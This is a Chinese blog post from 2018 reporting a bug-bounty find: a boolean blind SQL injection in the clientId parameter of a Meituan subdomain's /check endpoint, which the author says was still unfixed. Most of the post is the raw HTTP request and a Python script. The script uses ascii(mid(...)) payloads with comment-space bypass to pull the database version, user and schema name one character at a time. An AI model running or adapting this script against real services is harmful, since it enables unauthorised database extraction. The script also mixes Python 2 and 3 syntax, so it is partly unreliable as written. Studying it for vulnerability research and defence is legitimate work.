[ 高危 ]mt某站SQL注入

RANK 24

金币    24

等价RMB  240

与上一漏洞同源所以只有24

 

数据包:

GET /check?clientId=64915 HTTP/1.1

Host: xxx.meituan.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36

Accept: */*

Cookie:XX

Connection: close

 

clientId参数存在布尔型注入,sqlmap没注出来数据,所以写了个脚本验证

脚本

按照惯例,代码中可能泄露漏洞相关位置信息的都给去掉了,或者打码了。很新鲜,还未修好。

 1 #! /usr/bin/env python3
 2 # Date : 1/5 16:04
 3 # Comment: no comment
 4 
 5 
 6 import requests
 7 
 8 raw_url = xxx
 9 burp0_cookies = {xxx}
10 burp0_headers = {xxx}
11 
12 
13 def get_version():
14     version = ''
15     for i in range(1, 20):
16         for j in range(32, 127):
17             burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(version()," + str(i) + ",1))=" + str(j)
18             print burp0_url
19             try:
20                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
21             except Exception as e:
22                 continue
23             if "true" in res.text:
24                 version += chr(j)
25                 break
26         print('version:', version)
27 
28 
29 def get_user():
30     user = ''
31     for i in range(1, 20):
32         for j in range(32, 127):
33             burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(user()," + str(i) + ",1))=" + str(j)
34             print burp0_url
35             try:
36                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
37             except Exception as e:
38                 continue
39             if "true" in res.text:
40                 user += chr(j)
41                 break
42         print('user:', user)
43 
44 
45 def get_db():
46     current_db = ''
47     for i in range(1, 20):
48         for j in range(32, 127):
49             burp0_url = "http://aaa.bbb.com/check?clientId=54915'/**/or/**/ascii(mid(database()," + str(i) + ",1))=" + str(j)
50             print burp0_url
51             try:
52                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
53             except Exception as e:
54                 continue
55             if "true" in res.text:
56                 current_db += chr(j)
57                 break
58         print('current_db:', current_db)
59 
60 get_version()
61 get_db()
62 get_user()

 

sqlmap跑不出,就是扫描器先跑出来,但是sqlmap验证不了,却又确实存在的,可以写脚本验证,这是一种思路吧。

 

-634

 

posted @ 2018-01-12 16:04  huim  阅读(363)  评论(0编辑  收藏  举报